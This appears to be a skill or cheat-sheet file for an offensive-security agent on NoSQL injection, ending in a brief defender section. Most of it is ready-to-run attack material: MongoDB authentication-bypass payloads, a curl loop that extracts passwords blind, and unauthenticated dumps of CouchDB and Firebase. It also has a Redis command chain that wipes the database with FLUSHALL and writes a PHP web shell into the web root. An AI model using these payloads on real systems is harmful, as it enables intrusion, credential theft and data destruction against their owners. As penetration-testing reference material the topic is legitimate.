| name | nosqli |
| description | NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction. |
| metadata | {"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"} |
NoSQL Injection
NoSQL stores parse JSON / native objects. When user input becomes part
of a query object (not just a value), control flows into the query.
1. MongoDB — most common target
Auth bypass
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}}
{"user": "admin", "pass": {"$gt": ""}}
{"user": "admin", "pass": {"$regex": "^A"}}
Server-side JS injection
{"$where": "this.user == 'admin' && sleep(5000)"}
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}
$where was deprecated in Mongo 4.4 — still appears in legacy.
Operator extraction (blind)
for char in {a..z}; do
curl -s -X POST $TARGET/login \
-d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
| grep -q "success" && echo "char: $char"
done
2. CouchDB
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
3. Firebase Realtime Database
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
4. Redis
redis-cli -h target -p 6379 INFO
redis-cli -h target FLUSHALL
redis-cli -h target SET dir /var/www/html
redis-cli -h target SET dbfilename shell.php
redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
redis-cli -h target SAVE
5. Tools
- NoSQLMap — automated mongo injection (
nosqlmap.py)
- mongoaudit — config scanner
- Burp Intruder w/ payloads/NoSQL Injection/ as wordlist
- fuzzdb — has NoSQL payload variants
6. PoC
curl -s -X POST $TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
| jq
7. Severity
| Bug | Severity |
|---|
Auth bypass via $ne | Critical 9.8 |
| Blind char extraction of all user data | Critical 9.0 |
$where JS injection → RCE-adjacent (mongo runs the JS) | Critical 9.8 |
| Public CouchDB / Firebase | Critical (depends on data sensitivity) |
| Unauth Redis on internal net | High 7-8 |
8. Defender
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();
User.findOne({user: req.body.user}).select('+password');
mongoose.set('strictQuery', true);
Cross-references
- Upstream catalog:
skills/_corpus/payloads/NoSQL Injection/
- SQLi (different attack class, similar mindset):
skills/exploit/web/sqli.md